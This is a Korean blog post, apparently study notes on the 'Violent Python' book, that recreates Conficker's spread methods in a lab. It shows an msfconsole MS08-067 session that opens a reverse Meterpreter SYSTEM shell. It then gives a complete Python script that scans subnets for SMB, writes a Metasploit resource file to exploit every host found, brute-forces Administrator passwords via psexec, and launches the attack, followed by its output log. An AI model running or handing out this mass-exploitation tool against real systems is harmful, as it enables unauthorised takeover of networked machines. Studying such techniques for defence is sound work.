{"id":3831,"date":"2013-08-05T17:27:41","date_gmt":"2013-08-05T08:27:41","guid":{"rendered":"http:\/\/apollo89.com\/wordpress\/?p=3831"},"modified":"2013-09-13T08:37:46","modified_gmt":"2013-09-12T23:37:46","slug":"%ed%95%b4%ec%bb%a4%ec%9d%98-%ec%96%b8%ec%96%b4-%ec%b9%98%eb%aa%85%ec%a0%81-%ed%8c%8c%ec%9d%b4%ec%8d%ac-chapter-2-%ec%b9%a8%ed%88%ac-%ed%85%8c%ec%8a%a4%ed%8a%b8-%ec%bb%a8%ed%94%bc%ec%bb%a4","status":"publish","type":"post","link":"https:\/\/apollo89.com\/wordpress\/?p=3831","title":{"rendered":"\ud574\ucee4\uc758 \uc5b8\uc5b4, \uce58\uba85\uc801 \ud30c\uc774\uc36c &#8211; CHAPTER 2 \uce68\ud22c \ud14c\uc2a4\ud2b8 &#8211; \ucee8\ud53c\ucee4 \ub178\ub825\ud558\uba74 \ub41c\ub2e4"},"content":{"rendered":"<p>&nbsp;<\/p>\n<p><strong>Notice : \ud574\ub2f9 \uc790\ub8cc\uac00 \uc800\uc791\uad8c\ub4f1\uc5d0 \uc758\ud574\uc11c \ubb38\uc81c\uac00 \uc788\ub2e4\uba74 \ubc14\ub85c \uc0ad\uc81c\ud558\uaca0\uc2b5\ub2c8\ub2e4.<br \/>\n\uc5f0\uad6c\ubaa9\uc801\uc73c\ub85c \uc0ac\uc6a9\ud558\uc9c0 \uc54a\uace0 \uc545\uc758\uc801\uc778 \ubaa9\uc801\uc73c\ub85c \uc774\uc6a9\ud560 \uacbd\uc6b0 \ubc1c\uc0dd\ud560 \uc218 \uc788\ub294 \ubc95\uc801\uc740 \ucc45\uc784\uc740 \ubaa8\ub450 \ubcf8\uc778\uc5d0\uac8c \uc788\uc2b5\ub2c8\ub2e4.<br \/>\n<\/strong><\/p>\n<p><a href=\"http:\/\/blog.yes24.com\/lib\/adon\/View.aspx?blogid=2223538&#038;goodsno=8433461&#038;idx=15792&#038;ADON_TYPE=B&#038;regs=b\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-2135\" alt=\"VIOLENT_PYTHON_S\" src=\"http:\/\/apollo89.com\/wordpress\/wp-content\/uploads\/2013\/03\/VIOLENT_PYTHON_S.jpg\" width=\"172\" height=\"220\" \/><\/a><br \/>\n<a href=\"http:\/\/blog.yes24.com\/lib\/adon\/View.aspx?blogid=2223538&#038;goodsno=8433461&#038;idx=15792&#038;ADON_TYPE=B&#038;regs=b\" target=\"_blank\">[\uad6c\ub9e4\ud558\uae30]<\/a><\/p>\n<p><a href=\"http:\/\/apollo89.com\/wordpress\/?p=3616\" target=\"_blank\">\ud574\ucee4\uc758 \uc5b8\uc5b4, \uce58\uba85\uc801 \ud30c\uc774\uc36c &#8211; CHAPTER 1 \uc18c\uac1c<\/a><br \/>\n<a href=\"http:\/\/apollo89.com\/wordpress\/?p=3665\" target=\"_blank\">\ud574\ucee4\uc758 \uc5b8\uc5b4, \uce58\uba85\uc801 \ud30c\uc774\uc36c &#8211; CHAPTER 2 \uce68\ud22c \ud14c\uc2a4\ud2b8 &#8211; \ud3ec\ud2b8 \uc2a4\uce90\ub108 \ub9cc\ub4e4\uae30<\/a><br \/>\n<a href=\"http:\/\/apollo89.com\/wordpress\/?p=3819\" target=\"_blank\">\ud574\ucee4\uc758 \uc5b8\uc5b4, \uce58\uba85\uc801 \ud30c\uc774\uc36c &#8211; CHAPTER 2 \uce68\ud22c \ud14c\uc2a4\ud2b8 &#8211; SSH \ubd07\ub137 \uad6c\ucd95\ud558\uae30<\/a><br \/>\n<a href=\"http:\/\/apollo89.com\/wordpress\/?p=3823\" target=\"_blank\">\ud574\ucee4\uc758 \uc5b8\uc5b4, \uce58\uba85\uc801 \ud30c\uc774\uc36c &#8211; CHAPTER 2 \uce68\ud22c \ud14c\uc2a4\ud2b8 &#8211; FTP\uc640 \uc6f9\uc744 \uc774\uc6a9\ud55c \ub300\uaddc\ubaa8 \uacf5\uaca9<\/a><br \/>\n<a href=\"http:\/\/apollo89.com\/wordpress\/?p=3831\" target=\"_blank\">\ud574\ucee4\uc758 \uc5b8\uc5b4, \uce58\uba85\uc801 \ud30c\uc774\uc36c &#8211; CHAPTER 2 \uce68\ud22c \ud14c\uc2a4\ud2b8 &#8211; \ucee8\ud53c\ucee4 \ub178\ub825\ud558\uba74 \ub41c\ub2e4<\/a><\/p>\n<p>2.5 \ucee8\ud53c\ucee4, \ub178\ub825\ud558\uba74 \ub41c\ub2e4<br \/>\n\ucee8\ud53c\ucee4 &#8211; <a href=\"http:\/\/blog.naver.com\/younjun2000?Redirect=Log&#038;logNo=150046319543\" target=\"_blank\">http:\/\/blog.naver.com\/younjun2000?Redirect=Log&#038;logNo=150046319543<\/a><br \/>\n&#8211; \ucee8\ud53c\ucee4 \ub610\ub294 W32DownadUp \uc774\ub77c \ubd88\ub9ac\ub294 \uc6dc\uc740 200\uc5ec\uac1c\uad6d\uc5d0 5\ubc31\ub9cc\ub300\uc758 \ucef4\ud4e8\ud130\ub97c \uac10\uc5fc<br \/>\n&#8211; \ucee8\ud53c\ucee4\uc758 \ud575\uc2ec\uc740 \ubaa8\ub9ac\uc2a4\uc6dc\uc774 \uc0ac\uc6a9\ud588\ub358 \uacf5\uaca9 \ubc31\ud130\uc640 \uc720\uc0ac\ud55c \uae30\ubc95\uc774 \uc0ac\uc6a9(\ub450\uac1c\uc758 \ubc31\ud130\ub97c \uc774\uc6a9)<br \/>\n  1.\uc708\ub3c4\uc6b0 \uc11c\ubc84\uc758 \uc81c\ub85c\ub370\uc774 \ucde8\uc57d\uc810(\uc2a4\ud14d\uc744 \ubcc0\uc870\ud558\uc5ec \uc258\ucf54\ub4dc\ub97c \uc2e4\ud589\ud558\uace0, \uac10\uc5fc\ub41c \ud638\uc2a4\ud2b8\uc5d0 \uc790\uc2e0\uc758 \ubcf5\uc0ac\ubcf8\uc744 \ub2e4\uc6b4\ub85c\ub4dc)<br \/>\n  2.\ub514\ud3f4\ud2b8 \uad00\ub9ac\uc790 \ub124\ud06c\uc6cc\ud06c \uacf5\uc720(ADMIN$) \uacc4\uc815\uc5d0 \ubb34\ucc28\ubcc4 \ub300\uc785\uacf5\uaca9<\/p>\n<p>2.5.1 \uba54\ud0c0\uc2a4\ud50c\ub85c\uc787\uc73c\ub85c \uc708\ub3c4\uc6b0 SMB \uc11c\ube44\uc2a4 \uacf5\uaca9\ud558\uae30<br \/>\n&#8211; ms08_067_netapi \uc774\uc6a9<\/p>\n<pre class=\"lang:default decode:true \" >root@bt:~# msfconsole\r\n...\r\n       =[ metasploit v4.5.0-dev [core:4.5 api:1.0]\r\n+ -- --=[ 927 exploits - 499 auxiliary - 151 post\r\n+ -- --=[ 251 payloads - 28 encoders - 8 nops\r\n\r\nmsf &gt; use exploit\/windows\/smb\/ms08_067_netapi\r\nmsf  exploit(ms08_067_netapi) &gt; set RHOST 192.168.110.129\r\nRHOST =&gt; 192.168.110.129\r\nmsf  exploit(ms08_067_netapi) &gt; set PAYLOAD windows\/meterpreter\/reverse_tcp\r\nPAYLOAD =&gt; windows\/meterpreter\/reverse_tcp\r\nmsf  exploit(ms08_067_netapi) &gt; set LHOST 192.168.110.133\r\nLHOST =&gt; 192.168.110.133\r\nmsf  exploit(ms08_067_netapi) &gt; set LPORT 7777\r\nLPORT =&gt; 7777\r\nmsf  exploit(ms08_067_netapi) &gt; exploit -j -z\r\n[*] Exploit running as background job.\r\n\r\n[*] Started reverse handler on 192.168.110.133:7777 \r\nmsf  exploit(ms08_067_netapi) &gt; \r\n[*] Automatically detecting the target...\r\n[*] Fingerprint: Windows 2000 - Service Pack 0 - 4 - lang:Korean\r\n[*] Selected Target: Windows 2000 Universal\r\n[*] Attempting to trigger the vulnerability...\r\n[*] Sending stage (752128 bytes) to 192.168.110.129\r\n[*] Meterpreter session 1 opened (192.168.110.133:7777 -&gt; 192.168.110.129:1157) at 2013-08-21 15:10:36 +0900\r\n\r\nmsf  exploit(ms08_067_netapi) &gt; sessions\r\n\r\nActive sessions\r\n===============\r\n  Id  Type                   Information                Connection\r\n  --  ----                   -----------                ----------\r\n  1   meterpreter x86\/win32  NT AUTHORITY\\SYSTEM @ SDS  192.168.110.133:7777 -&gt; 192.168.110.129:1157 (192.168.110.129)\r\n\r\nmsf  exploit(ms08_067_netapi) &gt; sessions -i 1\r\n[*] Starting interaction with 1...\r\n\r\nmeterpreter &gt; \r\nmeterpreter &gt; execute -i -f cmd.exe\r\nProcess 2364 created.\r\nChannel 1 created.\r\nMicrosoft Windows 2000 [Version 5.00.2195]\r\n(C) Copyright 1985-2000 Microsoft Corp.\r\n\r\nC:\\WINNT\\system32&gt;\r\n\r\nC:\\WINNT\\system32&gt;ipconfig\r\nipconfig\r\n\r\nWindows 2000 IP Configuration\r\n\r\nEthernet adapter ???? ???? ???? 2:\r\n\tConnection-specific DNS Suffix  . : localdomain\r\n\tIP Address. . . . . . . . . . . . : 192.168.110.129\r\n\tSubnet Mask . . . . . . . . . . . : 255.255.255.0\r\n\tDefault Gateway . . . . . . . . . : 192.168.110.2\r\n\r\nC:\\WINNT\\system32&gt;<\/pre>\n<p>2.5.2 \uba54\ud0c0\uc2a4\ud50c\ub85c\uc787\uacfc \ud30c\uc774\uc36c \uc5f0\ub3d9\ud558\uae30<br \/>\n&#8211; \uc5ec\ub7ec\ub300\uc758 \uc11c\ubc84\ub97c \uc9c4\ud589\uc2dc \uc218\ub3d9\uc73c\ub85c \ud558\uae30 \ud798\ub4dc\ubbc0\ub85c \ud30c\uc774\uc36c\uc73c\ub85c \uc791\uc131<br \/>\n  1. SMB \ud504\ub85c\ud1a0\ucf5c(TCP 445) \ud3ec\ud2b8\uac00 \uc5f4\ub824\uc788\ub294\uc9c0 \uc2a4\uce90\ub2dd(nmap-python \uc0ac\uc6a9)<br \/>\n  2. \uba54\ud0c0\uc2a4\ud50c\ub85c\uc787 resource \ud30c\uc77c\uc744 \ub9cc\ub4e4\uc5b4\uc11c \ucde8\uc57d\ud55c \ud638\uc2a4\ud2b8\ub97c \uacf5\uaca9<br \/>\n  3. \uba54\ud0c0\uc2a4\ud50c\ub85c\uc787\uc758 \ub2e4\uc774\ub098\ubbf9 \ud398\uc774\ub85c\ub4dc\uc778 \ubbf8\ud130\ud504\ub9ac\ud130(Meterpreter)\ub97c \uc0ac\uc6a9<br \/>\n  4. multi\/handler \ub9ac\uc2a4\ub108 \uc124\uc815&#8230; \ubb34\uc2a8 \uc18c\ub9b0\uc9c0 \uc798\ubaa8\ub974\uaca0\uc74c..\u3160<br \/>\n  5. \ub9c8\uc9c0\ub9c9\uc73c\ub85c exploit -j(\uc791\uc5c5\uc758 \ucee8\ud0dd\uc2a4\ud2b8\uc5d0\uc11c) -z(\uc791\uc5c5\uacfc \uc989\uc2dc \uc0c1\ud638\uc18c\ud1b5\ud558\uc9c0 \ub9d0\uace0) \uc73c\ub85c \uacf5\uaca9\uc9c0\uc2dc<\/p>\n<p>2.5.3 \uc6d0\uaca9 \ud504\ub85c\uc138\uc2a4 \uc2e4\ud589 \uacf5\uaca9\ud558\uae30<br \/>\n&#8211; SMB \uc758 \uc0ac\uc6a9\uc790 \uc774\ub984\/\ud328\uc2a4\uc6cc\ub4dc \uc870\ud569\uc744 \ub9c8\ucc28\ubcc4 \ub300\uc785 \uacf5\uaca9 \ud558\ub3c4\ub85d smbBrute \ud568\uc218 \uc791\uc131<br \/>\n&#8211; smbBrute \ud568\uc218\ub294 \uac01 \ud398\uc2a4\uc6cc\ub4dc \ub9c8\ub2e4 \uba54\ud0c0\uc2a4\ud50c\ub85c\uc787 \uc124\uc815\ud30c\uc77c\uc744 \ub9cc\ub4e4\uc5b4\uc11c \uacf5\uaca9<\/p>\n<p>2.5.4 \ucee8\ud53c\ucee4 \ucd5c\uc885 \ucf54\ub4dc \ud1b5\ud569\ud558\uae30<\/p>\n<pre class=\"lang:python decode:true \" >#!\/usr\/bin\/python\r\n# -*- coding: utf-8 -*-\r\nimport os\r\nimport optparse\r\nimport sys\r\nimport nmap\r\n\r\ndef findTgts(subNet):\r\n    nmScan = nmap.PortScanner()\r\n    nmScan.scan(subNet, '445')\r\n    tgtHosts = []\r\n    for host in nmScan.all_hosts():\r\n        if nmScan[host].has_tcp(445):\r\n            state = nmScan[host]['tcp'][445]['state']\r\n            if state == 'open':\r\n                print '[+] Found Target Host: ' + host\r\n                tgtHosts.append(host)\r\n    return tgtHosts\r\n\r\ndef setupHandler(configFile, lhost, lport):\r\n    configFile.write('use exploit\/multi\/handler\\n')\r\n    configFile.write('set payload windows\/meterpreter\/reverse_tcp\\n')\r\n    configFile.write('set LPORT ' + str(lport) + '\\n')\r\n    configFile.write('set LHOST ' + lhost + '\\n')\r\n    configFile.write('exploit -j -z\\n')\r\n    configFile.write('setg DisablePayloadHandler 1\\n')\r\n\r\ndef confickerExploit(configFile,tgtHost,lhost,lport):\r\n    configFile.write('use exploit\/windows\/smb\/ms08_067_netapi\\n')\r\n    configFile.write('set RHOST ' + str(tgtHost) + '\\n')\r\n    configFile.write('set payload windows\/meterpreter\/reverse_tcp\\n')\r\n    configFile.write('set LPORT ' + str(lport) + '\\n')\r\n    configFile.write('set LHOST ' + lhost + '\\n')\r\n    configFile.write('exploit -j -z\\n')\r\n\r\n\r\ndef smbBrute(configFile,tgtHost,passwdFile,lhost,lport):\r\n    username = 'Administrator'\r\n    pF = open(passwdFile, 'r')\r\n    for password in pF.readlines():\r\n        password = password.strip('\\n').strip('\\r')\r\n        configFile.write('use exploit\/windows\/smb\/psexec\\n')\r\n        configFile.write('set SMBUser ' + str(username) + '\\n')\r\n        configFile.write('set SMBPass ' + str(password) + '\\n')\r\n        configFile.write('set RHOST ' + str(tgtHost) + '\\n')\r\n        configFile.write('set payload windows\/meterpreter\/reverse_tcp\\n')\r\n        configFile.write('set LPORT ' + str(lport) + '\\n')\r\n        configFile.write('set LHOST ' + lhost + '\\n')\r\n        configFile.write('exploit -j -z\\n')\r\n\r\ndef main():\r\n    configFile = open('meta.rc', 'w')\r\n\r\n    parser = optparse.OptionParser('[-] Usage %prog -H &lt;RHOST[s]&gt; -l &lt;LHOST&gt; [-p &lt;LPORT&gt; -F &lt;Password File&gt;]')\r\n    parser.add_option('-H', dest='tgtHost', type='string', help='specify the target address[es]')\r\n    parser.add_option('-p', dest='lport', type='string', help='specify the listen port')\r\n    parser.add_option('-l', dest='lhost', type='string', help='specify the listen address')\r\n    parser.add_option('-F', dest='passwdFile', type='string', help='password file for SMB brute force attempt')\r\n\r\n    (options, args) = parser.parse_args()\r\n\r\n    if (options.tgtHost == None) | (options.lhost == None):\r\n        print parser.usage\r\n        exit(0)\r\n\r\n    lhost = options.lhost\r\n    lport = options.lport\r\n    if lport == None:\r\n        lport = '1337'\r\n    passwdFile = options.passwdFile\r\n    tgtHosts = findTgts(options.tgtHost)\r\n\r\n    setupHandler(configFile, lhost, lport)\r\n\r\n    for tgtHost in tgtHosts:\r\n        confickerExploit(configFile, tgtHost, lhost, lport)\r\n        if passwdFile != None:\r\n            smbBrute(configFile,tgtHost,passwdFile,lhost,lport)\r\n\r\n    configFile.close()\r\n    os.system('msfconsole -r meta.rc')\r\n\r\nif __name__ == '__main__':\r\n    main()\r\n<\/pre>\n<p>\uc2e4\ud589\uacb0\uacfc<\/p>\n<pre class=\"lang:default decode:true \" ># python conficker.py -H 192.168.110.129 -l 192.168.110.133 -p 7777 -F userpass.txt \r\n[+] Found Target Host: 192.168.110.129\r\n...\r\n       =[ metasploit v4.5.0-dev [core:4.5 api:1.0]\r\n+ -- --=[ 927 exploits - 499 auxiliary - 151 post\r\n+ -- --=[ 251 payloads - 28 encoders - 8 nops\r\n\r\n[*] Processing meta.rc for ERB directives.\r\nresource (meta.rc)&gt; use exploit\/multi\/handler\r\nresource (meta.rc)&gt; set payload windows\/meterpreter\/reverse_tcp\r\npayload =&gt; windows\/meterpreter\/reverse_tcp\r\nresource (meta.rc)&gt; set LPORT 7777\r\nLPORT =&gt; 7777\r\nresource (meta.rc)&gt; set LHOST 192.168.110.133\r\nLHOST =&gt; 192.168.110.133\r\nresource (meta.rc)&gt; exploit -j -z\r\n[*] Exploit running as background job.\r\nresource (meta.rc)&gt; setg DisablePayloadHandler 1\r\nDisablePayloadHandler =&gt; 1\r\nresource (meta.rc)&gt; use exploit\/windows\/smb\/ms08_067_netapi\r\n[*] Started reverse handler on 192.168.110.133:7777 \r\n[*] Starting the payload handler...\r\nresource (meta.rc)&gt; set RHOST 192.168.110.129\r\nRHOST =&gt; 192.168.110.129\r\nresource (meta.rc)&gt; set payload windows\/meterpreter\/reverse_tcp\r\npayload =&gt; windows\/meterpreter\/reverse_tcp\r\nresource (meta.rc)&gt; set LPORT 7777\r\nLPORT =&gt; 7777\r\nresource (meta.rc)&gt; set LHOST 192.168.110.133\r\nLHOST =&gt; 192.168.110.133\r\nresource (meta.rc)&gt; exploit -j -z\r\n[*] Exploit running as background job.\r\nresource (meta.rc)&gt; use exploit\/windows\/smb\/psexec\r\nresource (meta.rc)&gt; set SMBUser Administrator\r\nSMBUser =&gt; Administrator\r\nresource (meta.rc)&gt; set SMBPass administrator:password\r\nSMBPass =&gt; administrator:password\r\nresource (meta.rc)&gt; set RHOST 192.168.110.129\r\nRHOST =&gt; 192.168.110.129\r\nresource (meta.rc)&gt; set payload windows\/meterpreter\/reverse_tcp\r\npayload =&gt; windows\/meterpreter\/reverse_tcp\r\nresource (meta.rc)&gt; set LPORT 7777\r\nLPORT =&gt; 7777\r\nresource (meta.rc)&gt; set LHOST 192.168.110.133\r\nLHOST =&gt; 192.168.110.133\r\nresource (meta.rc)&gt; exploit -j -z\r\n[*] Automatically detecting the target...\r\n[*] Exploit running as background job.\r\nresource (meta.rc)&gt; use exploit\/windows\/smb\/psexec\r\nresource (meta.rc)&gt; set SMBUser Administrator\r\n[*] Connecting to the server...\r\nSMBUser =&gt; Administrator\r\nresource (meta.rc)&gt; set SMBPass admin:12345\r\n[*] Authenticating to 192.168.110.129:445|WORKGROUP as user 'Administrator'...\r\nSMBPass =&gt; admin:12345\r\nresource (meta.rc)&gt; set RHOST 192.168.110.129\r\nRHOST =&gt; 192.168.110.129\r\nresource (meta.rc)&gt; set payload windows\/meterpreter\/reverse_tcp\r\npayload =&gt; windows\/meterpreter\/reverse_tcp\r\nresource (meta.rc)&gt; set LPORT 7777\r\nLPORT =&gt; 7777\r\nresource (meta.rc)&gt; set LHOST 192.168.110.133\r\nLHOST =&gt; 192.168.110.133\r\nresource (meta.rc)&gt; exploit -j -z\r\n[-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: The server responded with error: STATUS_LOGON_FAILURE (Command=115 WordCount=0)\r\n[*] Exploit running as background job.\r\nresource (meta.rc)&gt; use exploit\/windows\/smb\/psexec\r\nresource (meta.rc)&gt; set SMBUser Administrator\r\nSMBUser =&gt; Administrator\r\nresource (meta.rc)&gt; set SMBPass root:secret\r\n[*] Connecting to the server...\r\nSMBPass =&gt; root:secret\r\nresource (meta.rc)&gt; set RHOST 192.168.110.129\r\n[*] Authenticating to 192.168.110.129:445|WORKGROUP as user 'Administrator'...\r\nRHOST =&gt; 192.168.110.129\r\nresource (meta.rc)&gt; set payload windows\/meterpreter\/reverse_tcp\r\npayload =&gt; windows\/meterpreter\/reverse_tcp\r\nresource (meta.rc)&gt; set LPORT 7777\r\nLPORT =&gt; 7777\r\nresource (meta.rc)&gt; set LHOST 192.168.110.133\r\nLHOST =&gt; 192.168.110.133\r\nresource (meta.rc)&gt; exploit -j -z\r\n[-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: The server responded with error: STATUS_LOGON_FAILURE (Command=115 WordCount=0)\r\n[*] Exploit running as background job.\r\nresource (meta.rc)&gt; use exploit\/windows\/smb\/psexec\r\nresource (meta.rc)&gt; set SMBUser Administrator\r\n[*] Connecting to the server...\r\nSMBUser =&gt; Administrator\r\nresource (meta.rc)&gt; set SMBPass guest:guest\r\n[*] Fingerprint: Windows 2000 - Service Pack 0 - 4 - lang:Korean\r\n[*] Selected Target: Windows 2000 Universal\r\n[*] Authenticating to 192.168.110.129:445|WORKGROUP as user 'Administrator'...\r\nSMBPass =&gt; guest:guest\r\nresource (meta.rc)&gt; set RHOST 192.168.110.129\r\nRHOST =&gt; 192.168.110.129\r\nresource (meta.rc)&gt; set payload windows\/meterpreter\/reverse_tcp\r\npayload =&gt; windows\/meterpreter\/reverse_tcp\r\nresource (meta.rc)&gt; set LPORT 7777\r\nLPORT =&gt; 7777\r\nresource (meta.rc)&gt; set LHOST 192.168.110.133\r\nLHOST =&gt; 192.168.110.133\r\nresource (meta.rc)&gt; exploit -j -z\r\n[-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: The server responded with error: STATUS_LOGON_FAILURE (Command=115 WordCount=0)\r\n[*] Exploit running as background job.\r\nresource (meta.rc)&gt; use exploit\/windows\/smb\/psexec\r\n[*] Attempting to trigger the vulnerability...\r\nresource (meta.rc)&gt; set SMBUser Administrator\r\n[*] Connecting to the server...\r\nSMBUser =&gt; Administrator\r\nresource (meta.rc)&gt; set SMBPass root:toor\r\n[*] Authenticating to 192.168.110.129:445|WORKGROUP as user 'Administrator'...\r\nSMBPass =&gt; root:toor\r\nresource (meta.rc)&gt; set RHOST 192.168.110.129\r\nRHOST =&gt; 192.168.110.129\r\nresource (meta.rc)&gt; set payload windows\/meterpreter\/reverse_tcp\r\npayload =&gt; windows\/meterpreter\/reverse_tcp\r\nresource (meta.rc)&gt; set LPORT 7777\r\nLPORT =&gt; 7777\r\nresource (meta.rc)&gt; set LHOST 192.168.110.133\r\n[*] Sending stage (752128 bytes) to 192.168.110.129\r\nLHOST =&gt; 192.168.110.133\r\nresource (meta.rc)&gt; exploit -j -z\r\n[-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: The server responded with error: STATUS_LOGON_FAILURE (Command=115 WordCount=0)\r\n[*] Exploit running as background job.\r\n\r\n[*] Connecting to the server...\r\n[*] Authenticating to 192.168.110.129:445|WORKGROUP as user 'Administrator'...\r\nmsf  exploit(psexec) &gt; [-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: The server responded with error: STATUS_LOGON_FAILURE (Command=115 WordCount=0)\r\n[*] Meterpreter session 1 opened (192.168.110.133:7777 -&gt; 192.168.110.129:1184) at 2013-08-21 17:14:36 +0900<\/pre>\n<p>&nbsp;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>&nbsp; Notice : \ud574\ub2f9 \uc790\ub8cc\uac00 \uc800\uc791\uad8c\ub4f1\uc5d0 \uc758\ud574\uc11c \ubb38\uc81c\uac00 \uc788\ub2e4\uba74 \ubc14\ub85c \uc0ad\uc81c\ud558\uaca0\uc2b5\ub2c8\ub2e4. \uc5f0\uad6c\ubaa9\uc801\uc73c\ub85c \uc0ac\uc6a9\ud558\uc9c0 \uc54a\uace0 \uc545\uc758\uc801\uc778 \ubaa9\uc801\uc73c\ub85c \uc774\uc6a9\ud560 \uacbd\uc6b0 \ubc1c\uc0dd\ud560 \uc218 \uc788\ub294 \ubc95\uc801\uc740 \ucc45\uc784\uc740 \ubaa8\ub450 \ubcf8\uc778\uc5d0\uac8c \uc788\uc2b5\ub2c8\ub2e4. [\uad6c\ub9e4\ud558\uae30] \ud574\ucee4\uc758 \uc5b8\uc5b4, \uce58\uba85\uc801 \ud30c\uc774\uc36c &#8211; CHAPTER 1 \uc18c\uac1c \ud574\ucee4\uc758 \uc5b8\uc5b4, \uce58\uba85\uc801 \ud30c\uc774\uc36c &#8211; &hellip; <a href=\"https:\/\/apollo89.com\/wordpress\/?p=3831\">Continue reading <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[663,658],"tags":[1158,1216],"class_list":["post-3831","post","type-post","status-publish","format-standard","hentry","category-python-","category-book-2","tag-1158","tag-1216"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud574\ucee4\uc758 \uc5b8\uc5b4, \uce58\uba85\uc801 \ud30c\uc774\uc36c - CHAPTER 2 \uce68\ud22c \ud14c\uc2a4\ud2b8 - \ucee8\ud53c\ucee4 \ub178\ub825\ud558\uba74 \ub41c\ub2e4 - Apollo89.com<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/apollo89.com\/wordpress\/?p=3831\" \/>\n<meta property=\"og:locale\" content=\"ko_KR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud574\ucee4\uc758 \uc5b8\uc5b4, \uce58\uba85\uc801 \ud30c\uc774\uc36c - CHAPTER 2 \uce68\ud22c \ud14c\uc2a4\ud2b8 - \ucee8\ud53c\ucee4 \ub178\ub825\ud558\uba74 \ub41c\ub2e4 - Apollo89.com\" \/>\n<meta property=\"og:description\" content=\"&nbsp; Notice : \ud574\ub2f9 \uc790\ub8cc\uac00 \uc800\uc791\uad8c\ub4f1\uc5d0 \uc758\ud574\uc11c \ubb38\uc81c\uac00 \uc788\ub2e4\uba74 \ubc14\ub85c \uc0ad\uc81c\ud558\uaca0\uc2b5\ub2c8\ub2e4. \uc5f0\uad6c\ubaa9\uc801\uc73c\ub85c \uc0ac\uc6a9\ud558\uc9c0 \uc54a\uace0 \uc545\uc758\uc801\uc778 \ubaa9\uc801\uc73c\ub85c \uc774\uc6a9\ud560 \uacbd\uc6b0 \ubc1c\uc0dd\ud560 \uc218 \uc788\ub294 \ubc95\uc801\uc740 \ucc45\uc784\uc740 \ubaa8\ub450 \ubcf8\uc778\uc5d0\uac8c \uc788\uc2b5\ub2c8\ub2e4. [\uad6c\ub9e4\ud558\uae30] \ud574\ucee4\uc758 \uc5b8\uc5b4, \uce58\uba85\uc801 \ud30c\uc774\uc36c &#8211; CHAPTER 1 \uc18c\uac1c \ud574\ucee4\uc758 \uc5b8\uc5b4, \uce58\uba85\uc801 \ud30c\uc774\uc36c &#8211; &hellip; Continue reading &rarr;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/apollo89.com\/wordpress\/?p=3831\" \/>\n<meta property=\"og:site_name\" content=\"Apollo89.com\" \/>\n<meta property=\"article:published_time\" content=\"2013-08-05T08:27:41+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2013-09-12T23:37:46+00:00\" \/>\n<meta property=\"og:image\" content=\"http:\/\/apollo89.com\/wordpress\/wp-content\/uploads\/2013\/03\/VIOLENT_PYTHON_S.jpg\" \/>\n<meta name=\"author\" content=\"apollo89\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\uae00\uc4f4\uc774\" \/>\n\t<meta name=\"twitter:data1\" content=\"apollo89\" \/>\n\t<meta name=\"twitter:label2\" content=\"\uc608\uc0c1 \ub418\ub294 \ud310\ub3c5 \uc2dc\uac04\" \/>\n\t<meta name=\"twitter:data2\" content=\"7\ubd84\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/apollo89.com\\\/wordpress\\\/?p=3831#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/apollo89.com\\\/wordpress\\\/?p=3831\"},\"author\":{\"name\":\"apollo89\",\"@id\":\"https:\\\/\\\/apollo89.com\\\/wordpress\\\/#\\\/schema\\\/person\\\/93f56825cac3b2f18e5f107995066c82\"},\"headline\":\"\ud574\ucee4\uc758 \uc5b8\uc5b4, \uce58\uba85\uc801 \ud30c\uc774\uc36c &#8211; CHAPTER 2 \uce68\ud22c \ud14c\uc2a4\ud2b8 &#8211; \ucee8\ud53c\ucee4 \ub178\ub825\ud558\uba74 \ub41c\ub2e4\",\"datePublished\":\"2013-08-05T08:27:41+00:00\",\"dateModified\":\"2013-09-12T23:37:46+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/apollo89.com\\\/wordpress\\\/?p=3831\"},\"wordCount\":56,\"commentCount\":4,\"image\":{\"@id\":\"https:\\\/\\\/apollo89.com\\\/wordpress\\\/?p=3831#primaryimage\"},\"thumbnailUrl\":\"http:\\\/\\\/apollo89.com\\\/wordpress\\\/wp-content\\\/uploads\\\/2013\\\/03\\\/VIOLENT_PYTHON_S.jpg\",\"keywords\":[\"\uc2a4\ud130\ub514\",\"\uce58\uba85\uc801\ud30c\uc774\uc36c\"],\"articleSection\":[\"Python\\\/Ruby\\\/Perl\",\"Reading\"],\"inLanguage\":\"ko-KR\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/apollo89.com\\\/wordpress\\\/?p=3831#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/apollo89.com\\\/wordpress\\\/?p=3831\",\"url\":\"https:\\\/\\\/apollo89.com\\\/wordpress\\\/?p=3831\",\"name\":\"\ud574\ucee4\uc758 \uc5b8\uc5b4, \uce58\uba85\uc801 \ud30c\uc774\uc36c - CHAPTER 2 \uce68\ud22c \ud14c\uc2a4\ud2b8 - \ucee8\ud53c\ucee4 \ub178\ub825\ud558\uba74 \ub41c\ub2e4 - 